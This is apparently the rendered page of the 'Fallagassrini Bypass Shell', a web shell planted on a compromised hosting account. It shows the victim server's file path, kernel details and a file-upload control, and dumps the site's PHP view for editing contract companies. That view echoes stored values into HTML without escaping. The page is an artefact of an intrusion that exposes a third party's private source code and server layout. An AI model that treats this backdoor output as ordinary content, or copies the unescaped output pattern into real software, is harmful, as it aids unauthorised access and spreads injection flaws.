? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/rms/application/views/master/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/rms/application/views/master/edit_contract.php

<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
       
        $this->load->view('documentreadyfunctions');
        $location=$this->mastermodel->getdatas('location','location_id','asc','location_id');
    ?>      
<div class="icons_main">
    <div  class="icons">   
       <img src="<?=base_url()?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('master','viewinmastersearch','search_contract','view_contract','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Updating contracting company </h4>
    </div>
</div>
<?php
 $attributes=array('id'=>'validateform','class'=>'validate');
 echo form_open('master/addinmaster/update_contract/view_contract/1',$attributes);        
 ?>
<div class="grid_6">
    <div class="box">
            <div class="header main">Company Details           
                    <span></span>
            </div>
         
            <div class="content no-padding">
                <div class="section _100">
                    <label>Company Name </label>
                    <div>
                            <input name="cc_name" id="cc_name" class="required"  value="<?=$viewinfo->cc_name?>">
                    </div>
                </div>
                 <div class="section _100">
                    <label> Code </label>
                    <div>
                            <input name="cc_code" id="cc_code"  readonly="readonly" value="<?=$viewinfo->cc_code?>">                          
                    </div>
                </div>
                 <div class="section _100">
                    <label>Address</label>
                    <div>
                            <textarea name="cc_address" id="cc_address" ><?=$viewinfo->cc_address?></textarea>
                    </div>
                </div>              
                <div class="section _100">
                    <label> Country </label>
                    <div>
                            <input name="cc_country" id="cc_country"  value="<?=$viewinfo->cc_country?>">
                    </div>
                </div>
                <div class="section _100">
                    <label> Location </label>
                     <div style="margin-top: 6px;">
                        <select name="cc_location" class="required" id="cc_location">
                            <option value="">Select</option>
                            <?php
                                foreach ($location as $list) {
                                ?>
                             <option value="<?=$list['location_id'];?>"<?php if($list['location_id']==$viewinfo->cc_location){echo "selected";} ?>><?=$list['location_name'];?></option>
                            <?php
                                }
                            ?>
                        </select>
                  </div>
                </div>                                               
            </div>               
    </div> 
</div> 

<div class="grid_6">
    <div class="box"> 
        <div class="header main"> Contact Details</div>            
            <div class="content no-padding">
                <div class="section _100">
                    <label> Office Phone </label>
                    <div>
                            <input name="cc_phone"  id="cc_phone" value="<?=$viewinfo->cc_phone?>">
                    </div>
                </div>
                 <div class="section _100">
                    <label> Mobile </label>
                    <div>
                            <input name="cc_mobile"  id="cc_mobile" value="<?=$viewinfo->cc_mobile?>">
                    </div>
                </div>
                 <div class="section _100">
                    <label> Fax</label>
                    <div>
                            <input name="cc_fax"  id="cc_fax" value="<?=$viewinfo->cc_fax?>">
                    </div>
                </div>     
                 <div class="section _100">
                    <label> E Mail </label>
                    <div>
                            <input name="cc_e_mail" class="mail" id="cc_e_mail" value="<?=$viewinfo->cc_e_mail?>"  >
                    </div>
                </div>       
                <div class="section _100">
                    <label>Remarks</label>
                    <div>
                            <textarea name="cc_remarks" id="cc_remarks"><?=$viewinfo->cc_remarks?></textarea>
                    </div>
                </div>                                     
            </div>           
    </div> 
     
</div> 
<div class="grid_12">
    <div class="box">
            <div class="header main">  Contact Persons            
                   <span></span>
            </div>
      
       <table class="table">
            <caption></caption>
            <tr>
                <th>Contact Name</th>
                <th>Designation</th>
                <th>Mobile</th>
                <th>Phone</th>
                <th>Email</th>
                <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
            </tr>           
            <?php
              if(!empty($details))
              {
                  foreach($details as $k=>$row)
                  {
                    echo '<tr>';
                    echo '<td><input type="text" name="cc_contact_name" id="cc_contact_name" value="'.$row['cc_contact_name'].'"/></td>';
                    echo '<td><input type="text" name="cc_contact_designation" id="cc_contact_designation" value="'.$row['cc_contact_designation'].'"/></td>';
                    echo '<td><input type="text" name="cc_contact_mobile" id="cc_contact_mobile" value="'.$row['cc_contact_mobile'].'"/></td>';
                    echo '<td><input type="text" name="cc_contact_phone" id="cc_contact_phone" value="'.$row['cc_contact_phone'].'"/></td>';
                    echo '<td><input type="text" name="cc_contact_email" id="cc_contact_email" value="'.$row['cc_contact_email'].'"/></td>';
                    echo '<td><img style="float: right; vertical-align: top;"src="'.base_url().'assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/></td>';
                    echo '</tr>';  
                  }
              }
              else
              {
            ?>
             <tr>
                <td><input type="text" name="cc_contact_name" id="cc_contact_name"/></td>
                <td><input type="text" name="cc_contact_designation" id="cc_contact_designation"/></td>
                <td><input type="text" name="cc_contact_mobile" id="cc_contact_mobile"/></td>
                <td><input type="text" name="cc_contact_phone" id="cc_contact_phone"/></td>
                <td><input type="text" name="cc_contact_email" id="cc_contact_email"/></td>
                <td>
                  <img style="float: right; vertical-align: top;"src="<?=base_url()?>assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                </td>
            </tr>
            <?php
              }
              ?>
        </table>
        <div class="actions"> 
                 <div class="actions-left">
                            <input type="reset">
                            <input type="hidden" name="resfunction" value="search_contract"/>
                            <input type="hidden" name="cc_id" value="<?=$viewinfo->cc_id?>"/>
                    </div>           
                    <div class="actions-right">
                            <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Update</button>
                    </div>
            </div>        
    </div>    
</div> 
   


<?php echo form_close();?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net